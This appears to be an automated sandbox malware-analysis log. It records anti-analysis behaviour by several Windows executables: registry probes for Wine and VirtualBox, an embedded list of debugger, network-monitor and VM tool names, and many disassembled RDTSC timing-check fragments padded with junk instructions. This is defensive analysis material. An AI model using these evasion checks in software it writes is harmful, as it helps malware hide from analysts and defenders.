Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DXENSERVICE.EXE4P
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DWIRESHARK.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMU-GA.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMUSRVC.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DX64DBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DFIDDLER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DOLLYDBG.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DQEMU-GA.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DVMUSRVC.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: DPROCESSHACKER.EXE
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1253 second address: 8B125F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jo 00007F8481503866h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B125F second address: 8B1263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1651 second address: 8B1657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1657 second address: 8B165E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B165E second address: 8B1683 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8481503870h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1683 second address: 8B1691 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007F8480743926h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B193C second address: 8B194C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B194C second address: 8B1962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1962 second address: 8B1968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B1968 second address: 8B1977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8480743926h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B57E3 second address: 8B5813 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848150386Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e jmp 00007F8481503874h 0x00000013 pop edx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push eax 0x0000001a pop eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5813 second address: 8B5835 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F848074392Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5835 second address: 8B5839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B58CF second address: 8B58DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5A5A second address: 8B5AAD instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8481503866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F8481503868h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor cx, 77B8h 0x0000002a pushad 0x0000002b mov edx, dword ptr [ebp+122D35B4h] 0x00000031 movzx esi, cx 0x00000034 popad 0x00000035 push 00000000h 0x00000037 xor dword ptr [ebp+122D1F0Ch], esi 0x0000003d push E7EFC6E9h 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 js 00007F8481503866h 0x0000004b pushad 0x0000004c popad 0x0000004d popad 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5AAD second address: 8B5AB2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5AB2 second address: 8B5B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 18103997h 0x0000000e mov ecx, dword ptr [ebp+122D3868h] 0x00000014 push 00000003h 0x00000016 and cl, 00000032h 0x00000019 push 00000000h 0x0000001b mov dword ptr [ebp+122D19F8h], esi 0x00000021 push 00000003h 0x00000023 push 00000000h 0x00000025 push edx 0x00000026 call 00007F8481503868h 0x0000002b pop edx 0x0000002c mov dword ptr [esp+04h], edx 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc edx 0x00000039 push edx 0x0000003a ret 0x0000003b pop edx 0x0000003c ret 0x0000003d mov dword ptr [ebp+122D1A2Fh], ebx 0x00000043 push BBD99289h 0x00000048 pushad 0x00000049 jbe 00007F8481503868h 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5B83 second address: 8B5C26 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F8480743928h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1878h], ecx 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 add edx, dword ptr [ebp+122D38A4h] 0x00000037 pop ecx 0x00000038 push ecx 0x00000039 xor edi, dword ptr [ebp+122D3718h] 0x0000003f pop ecx 0x00000040 call 00007F8480743929h 0x00000045 jmp 00007F8480743935h 0x0000004a push eax 0x0000004b jmp 00007F8480743930h 0x00000050 mov eax, dword ptr [esp+04h] 0x00000054 push esi 0x00000055 jp 00007F848074392Ch 0x0000005b pop esi 0x0000005c mov eax, dword ptr [eax] 0x0000005e pushad 0x0000005f jmp 00007F848074392Ch 0x00000064 jbe 00007F848074392Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8B5C26 second address: 8B5CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F8481503868h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov dword ptr [ebp+122D1E38h], edx 0x00000030 push 00000003h 0x00000032 call 00007F848150386Ah 0x00000037 movzx edx, dx 0x0000003a pop esi 0x0000003b push 00000000h 0x0000003d mov esi, 07D34AC9h 0x00000042 push 00000003h 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007F8481503868h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 00000015h 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e jmp 00007F8481503873h 0x00000063 push B13CA0F6h 0x00000068 push esi 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5CDE second address: 8D5CE3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5CE3 second address: 8D5CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8ACB19 second address: 8ACB45 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8480743926h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d jno 00007F8480743926h 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 pop ebx 0x00000017 pushad 0x00000018 jmp 00007F8480743931h 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3BB5 second address: 8D3BDF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8481503868h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8481503878h 0x0000000f js 00007F8481503866h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3BDF second address: 8D3BFD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F8480743926h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F8480743928h 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3BFD second address: 8D3C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3C01 second address: 8D3C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3C07 second address: 8D3C18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F848150386Bh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3C18 second address: 8D3C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D3EE0 second address: 8D3EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4012 second address: 8D401D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D401D second address: 8D4023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D44F7 second address: 8D44FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D44FF second address: 8D4503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4624 second address: 8D4628 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4628 second address: 8D464C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8481503873h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F848150386Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D464C second address: 8D4656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4783 second address: 8D4787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4787 second address: 8D478B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4B7E second address: 8D4B83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4B83 second address: 8D4B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4B89 second address: 8D4BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 jnl 00007F8481503866h 0x0000000f pop ebx 0x00000010 jmp 00007F8481503877h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F848150386Bh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4CFD second address: 8D4D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4D03 second address: 8D4D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D4D09 second address: 8D4D13 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F848074392Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8C8BCF second address: 8C8BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5563 second address: 8D556E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5B55 second address: 8D5B8A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8481503866h 0x00000008 jmp 00007F8481503873h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8481503874h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5B8A second address: 8D5B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D5B8E second address: 8D5B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DA115 second address: 8DA11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DAF6F second address: 8DAF73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DC8E5 second address: 8DC8F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8DC8F3 second address: 8DC8FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F8481503866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1203 second address: 8E1207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1207 second address: 8E1210 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1210 second address: 8E121E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E121E second address: 8E1222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1222 second address: 8E1228 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1228 second address: 8E1247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8481503879h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1247 second address: 8E1253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F8480743926h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1968 second address: 8E1993 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8481503866h 0x00000008 jnc 00007F8481503866h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F8481503878h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1993 second address: 8E1999 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E1ADC second address: 8E1AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F848150386Bh 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3D73 second address: 8E3D7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3D7A second address: 8E3D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3D87 second address: 8E3D9B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3D9B second address: 8E3DA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E3DA2 second address: 8E3DC0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007F8480743926h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 jmp 00007F848074392Ch 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E42A2 second address: 8E42C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F8481503873h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E4B9B second address: 8E4B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E4B9F second address: 8E4BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E4C86 second address: 8E4CA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F848074392Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jnl 00007F8480743926h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E4CA4 second address: 8E4CA9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E561D second address: 8E563E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8480743935h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E80CC second address: 8E80D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E8705 second address: 8E8709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E91B2 second address: 8E91CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8481503871h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8E9C68 second address: 8E9C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EA72D second address: 8EA731 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8EBC6D second address: 8EBC77 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8480743926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
